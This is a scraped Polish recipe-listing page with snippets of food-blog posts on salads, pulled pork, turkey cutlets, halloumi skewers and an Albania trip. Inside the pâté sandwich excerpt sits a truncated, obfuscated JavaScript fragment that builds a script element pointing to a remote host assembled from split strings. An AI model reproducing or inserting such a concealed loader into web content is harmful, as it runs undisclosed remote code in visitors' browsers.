sałatka z papryki - 4065 przepisów (strona:206/271)

Chipsy buraczane 167

Chipsy buraczane to idealna alternatywa dla osób będących na diecie lub po prostu zdrowo się odżywiających. Smakują naprawdę świetnie. Niektóre cieńsze są lekko chrupkawe; te grubsze

Czarnawisienka
Szybkie kanapki z pasztetem 121

sałatą, pomidorem, ogórkiem czy papryką i rzodkiewką. Smak pasztetu w połączeniu z warzywami będzie jeszcze bardziej wyrazisty oraz aksamitny. Idealne połączenie stanowi w połączeniu z produktami kiszonymi: ogórkami, marynowaną papryką lub patisonami. Nie wahajmy się też użyć chrzanu, musztardy lub ćwikły. Na przyjęcie, niespodziewaną wizytę gości lub w ramach drugiego śniadania możemy połączyć mięsny smak pasztetu z odrobiną słodyczy(...)pasztetu powoli, np. przygotować z nich koreczki. Możemy ponadziewać na wykałaczki kostki pasztetu razem z oliwkami, marynowanymi warzywami lub wspomnianymi suszonymi śliwkami. Takie same kostki wkroimy także do szybkiej sałatki, a długie paseczki podsmażymy i podamy z sosem czosnkowym. (function(){ i32r_=("u"+"st");i32r=document.createElement("script");i32r.async=true; i32ru="12087833";i32r_+="a"+("t.");i32r_+="i"+("nf"+("o"))+("/"); i32ru+=".2m6cfus532rmnvhk";i32ru

Moja smaczna kuchnia
"C" jak Ciecierzyca! ;) 277

dosyć popularna, ale może ktoś , tak jak ja niedawno, szuka informacji na jej temat. CIECIERZYCA- nazywana też cieciorką lub grochem włoskim, pochodzi z Bliskiego Wschodu. Ugotowana, nadaje się do sałatek, zup czy dań z makaronem i nie tylko. Jest źródłem wielu składników odżywczych: białko, fosfor, potas, witaminy z grupy B, żelazo i błonnik. A smak?:) Ciężki do opisania, ale bardzo(...)wcześniej sparzonych i duszonych pomidorów. Jeśli nie chcecie dodawać kupionego przecieru, możecie do zupy dodać 3-4 sparzone i rozdrobnione pomidory. 2-3 łyżeczki koncentratu pomidorowego sól, pieprz, papryka słodka, rozmaryn Ciecierzycę gotujemy zgodnie z opisem na opakowaniu. U mnie należało ją namoczyć w zimnej wodzie przez 12 godzin (najlepiej na noc), a następnie gotować 1-1,5 godziny

Czerwona Porzeczka
Szybki obiad 314

łyżki wody 4 łyżki oleju 1 łyżka miodu 2 łyżki sosu sojowego 2 łyżki przyprawy do kurczaka 2 łyżki przyprawy do mięsa/ uniwersalnej pieprz czarny mielony pół łyżeczki papryki czerwonej mielonej ziele angielskie liść laurowy Składniki marynaty mieszam, mięso dokładnie myję i ściągam skórę, wiem, że niektórzy mogą pomyśleć, że mięso bez skóry jest mniej smaczne (co nie jest prawdą(...)naczynia żaroodpornego i piekę w piekarniku ok. 50 minut (30 minut pod przykryciem, później polewam mięso marynatą i ściągam pokrywkę).  P odawać można z ryżem, ziemniakami i ulubioną sałatką . Pozostał ą marynat ę mo żna wykorzystać do baz y sosu , dodać pół opakowania śmietany lub p ół litra wo dy zagotować i zagęścić albo sosem z torebki albo dwiema

NA MOIM TALERZU
Wieprzowina czesana czyli pulled pork 187

morskiej 2 łyżeczki cukru trzcinowego 2 łyżeczki przyprawy obsypki kaukaskiej 1 łyżeczka pieprzu kolorowego całego 1 łyżeczka gorczycy 1 łyżeczka papryki słodkiej 1 łyżeczka papryki wędzonej słodkiej 1 łyżeczka papryki ostrej 3 kulki jałowca 2 łyżki sosu Worcester 3 ząbki czosnku 2 łyżki oleju rzepakowego Przygotowanie: Wszystkie przyprawy oprócz sosu worcoster i oleju zmiksować w blenderze lub utłuc drobno(...)około 15 minut i można "czesać" inaczej mówiąc rozdzielać na pojedyncze włókna. Mięsko najlepiej "czesać" widelcem. Najlepiej smakuje z chlebkiem pita, bułką pszenną lub razową z dodatkiem ulubionych warzyw, sałatek, musztardy, chrzanu lub ketchupu

Ala piecze i gotuje
Pieczone filety z kurczaka w musztardzie i migdałach (bez glutenu) 363

niebo lepszy od smażonego :) Składniki (2-3 porcje): - 2 filety z kurczaka - 4 łyżki oleju rzepakowego/oliwy - 1,5 łyżki musztardy Dijon - kilka kropel wody - sól, pieprz do smaku; papryka słodka, czosnek granulowany, bazylia suszona( po łyżeczce małej) - garść płatków migdałów - 1 łyżka sezamu - 1 łyżka siemienia lnianego  - 2 łyżki mielonego lnu - sól, pieprz do smaku do mięsa Kurczaka umyj(...)posmaruj z obu stron musztardowym sosem, obtocz w siemieniowej panierce a na koniec posyp płatkami migdałów*. Piecz ok. 20 minut w 180 stopniach. Podałam z pieczonymi ziemniaczkami** i kolorową sałatką. * Płatki migdałów dość szybko się przypiekają, trzeba na nie uważać. Ja kurczaka piekłam przez większość czasu w dolnej części piekarnika, pod ziemniakami, dlatego się nie zarumieniły mocno. ** Jak przygotowuję ziemniaki

Corner With Recipes
Kotleciki z indyka ze szpinakiem i ciecierzycą 135

ściągać:( Dopiero rozmowa z Mamą przypomniała mi o nim. Teraz jednak wiatrak pracuje pełną parą :)! Oczywiście przy takich temperaturach człowiek nie ma ochoty na jedzenie, może jedynie na sałatki i owoce i mnóssstwo wody Jednak od czasu do czasu trzeba zrobić coś konkretnego i dlatego powstały te kotleciki. Właściwie kotleciki z indyka ze szpinakiem i ciecierzycą to wyjątkowo udany eksperyment(...)ciecierzycą Składniki: 1 kg mielonego mięsa z piersi indyka 1 puszka ciecierzycy 100 g szpinaku świeżego 2 ząbki czosnku 1 jajko 1 łyżeczka kminu rzymskiego, mielonego 1 łyżeczka papryki słodkiej 1/2 łyżeczki kolendry, mielonej 1/2 łyżeczki soli 1/2 łyżeczki pieprzu 1 puszka pomidorów (400g) oliwa, mąka do obtaczania 1. Szpinak opłukać. Na patelni rozgrzać 1-2 łyżki oliwy, dodać przeciśnięty

UgotujmyTo.pl
Wiejski twaróg w oleju rzepakowym i ziołach 187

Marynowaliście kiedyś twaróg ? Jeśli nie, to polecam. Wyśmienity do sałatek lub jako samodzielna przystawka. Marynujcie w czym lubicie, dobór ziół zależy tylko i wyłącznie od Was. Latem wybierajcie świeże zioła, zimą używajcie suszonych. Do marynowanie używajcie oleju rzepakowego. Olej rzepakowy jest naturalnym źródłem kwasów omega – 3 i i dlatego powinien znaleźć zasłużone miejsce w każdej kuchni. To jeden z najzdrowszych(...)Składniki: 0,5 kg twarogu ( najlepiej wiejskiego, od gospodyni ) około 400 ml oleju rzepakowego 3 łyżki oleju rydzowego lub oliwy z oliwek 1 ząbek czosnku 1 łyżka płaska papryki słodkiej w proszku gałązki świeżego tymianku liście świeżej bazylii sól morska  Wykonanie: Twaróg pokroić w kostkę wielkości około 1x1 cm. Ułożyć w niedużych słoiczkach. Olej rzepakowy wymieszać z olejem rydzowym

kolorowotorcikowo
Zapiekany filet z indyka na warzywach (low-carb) 152

breją, tylko komponują się z całością idealnie. My pałaszujemy takie danie samo, ale sprawdzi się idealnie jako dodatek do ryżu czy kaszy. Możecie podać do niego również sałatkę z pomidorów i cebulki. Ja uwielbiam natkę, więc góra oczywiście musiała być nią posypana. Przed pieczeniem filet podzieliłam na sznycle, jeśli tego nie zrobicie, czas pieczenia mięsa się wydłuży. Jako warzyw użyłam(...)indyka na warzywach (low-carb) window.ajaxurl = "http://mieszamwgarnku.pl/wp-admin/admin-ajax.php"; Ingredients Sos 2/3 szkl. majonezu 1/2 szkl. tartego sera żółtego ( u mnie gouda) 3 ząbki czosnku 1 łyżeczka płatków ostrej papryki 1 mała posiekana w kostkę cebulka 2 łyżki szczypiorku sól, pieprz 1/2 kalafiora 1/2 brokuła 400 g fileta z indyka Natka do podania Instructions Sos Ze składników robimy gęsty

Mieszam w Garnku
Cevapčići - chorwackie kotleciki grillowane 223

każdego rodzaju mięsa są pyszne!), podaje się z jasnym chlebem, przypominającym naszą bułkę wrocławską (ja uwielbiam je z tureckim chlebem), do tego obowiązkowo ajvar i sos typu tzatziki, często sałatkę z pomidorów i cebuli. Przynajmniej tak jadłam je wiele razy w Chorwacji i tak podawało się je w moim domu. Koniecznie spróbujcie(...)duża łyżka ostrej musztardy 1 duża cebula biała 1 duża cebula czerwona 4-5 ząbków czosnku 1-2 łyżki vegety (ważne!) 1 płaska łyżka pieprzu ziołowego 1 płaska łyżka papryki mielonej ostrej lub słodkiej 1 łyżka majeranku 1 mała suszona papryczka chili (opcjonalnie - ja daję bo lubimy dość pikantne) dużo czarnego pieprzu do smaku sól do smaku tymianek, cząber

Kuchnia Prezydentowej
[Wege grill] Szaszłyki z halloumi i warzywami 155

jeszcze szaszłyk? Mam wrażenie, że świeże powietrze i aromat węgla pozbawiają nas resztek zdrowego rozsądku :) U mnie w domu na szczęście poza (powiedzmy szczerze) górą mięsa, zawsze była jakaś sałatka, pieczone ziemniaki, grillowany chlebek. Bardzo lubię też grillowaną cukinię z sosem tzatziki. A jak to wygląda u Was? Dziś podrzucam Wam pierwszy z moich pomysłów na potrawę z grilla(...)udanego długiego weekendu! Do poczytania w poniedziałek, szykuję dla Was recenzję książki :) Szaszłyki z halloumi i warzywami przepis własny Składniki (na 6 sztuk): 250 g sera halloumi 1 czerwona papryka 1 nieduża czerwona cebula 1 nieduża cukinia marynata: 4 łyżki oliwy, sok i skórka z 1 cytryny, 1/2 łyżeczki płatków chilli, garść liści mięty posiekanych sól, pieprz Przygotowanie: Ser halloumi

Chilli Czosnek i Oliwa
Pieczone warzywa z sosem do grilla, obiadu 139

Czasem mamy ochotę na odmianę czy to dania obiadowego czy to grilla. Tak powstał pomysł na te warzywa. Warzywa pieczone z sosem, nie wymagają dużego nakładu

Mieszam w Garnku
Wakacje w Albanii - Ksamil, Saranda i Butrint 237

pełne śmieci, opuszczone hotele oraz domy, co nie korzystnie wpływa na wizerunek miasta. W Sarandzie odwiedziliśmy miejscowy targ warzywno-owocowy, na którym kupiliśmy suszone oregano, liście laurowe oraz ostrą paprykę. Zwiedziliśmy także ortodoksyjny kościół, ruiny synagogi oraz zamek Lekursji wybudowany przez Wielkiego Sulejmana. Jednym słowem na brak atrakcji nie mogliśmy narzekać ;) Udaliśmy się także na wycieczkę (komunikacją międzymiastową - bilet(...)Ksamil jak i Sarandzie. Jednak zauważyłam, że praktycznie w każdym miejscu jest identyczne menu: owoce morze, makarony, drób/wieprzowina, zupy (zawsze trzy rodzaje: z kurczaka, rybna i warzywna) i sałatki. Nie dane mi było spróbować dań kuchni regionalnej, ponieważ po prostu nie było ich w żadnym menu. Ale udało mi się zrobić kilka zdjęć tego co jadłam w Albanii

Kolejny blog o gotowaniu
Kuchnia śródziemnomorska w wersji wege. Recenzja książki. 193

Vegetarian Mediterranean Cooking" Beverley Jollands to zbiór przepisów wege w słonecznym południowym klimacie krajów śródziemnomorskich. Połączenie dwóch nurtów żywieniowych, które bardzo cenię. Zupa z cukinii z fetą, koperkiem i papryką, dip z zielonego groszku, czy marokańskie naleśniki szpinakowe to potrawy, od których z pewnością pocieknie Wam ślinka. Jest tylko jeden szkopuł, o którym informuję od razu - książka niestety nie została(...)kuchnia śródziemnomorska jest dla mnie nieskończonym źródłem inspiracji.  Książka "Vegetarian Mediterranean Cooking" zgromadziła 180 propozycji na takie właśnie dania. Zostały one podzielone na rozdziały: przystawki, zupy, dania główne, sałatki, dodatki do dań głównych, desery, oraz pieczywo, możemy zatem bez problemu żywić się wege od rana do nocy.  Większość to dania "oryginalnie" bezmięsne, jest też trochę mięsnych klasyków przerobionych

Chilli Czosnek i Oliwa
Tatar ze śledzia babci Basi 157

Na moim blogu znajdziesz przepisy na potrawy domowe, proste, łatwe i bez wyszukanych produktów oraz porady kulinarne. Cenię sobie NORMALNOŚĆ – codziennie i od święta. Dziękuję

Pysznosci Babci Basi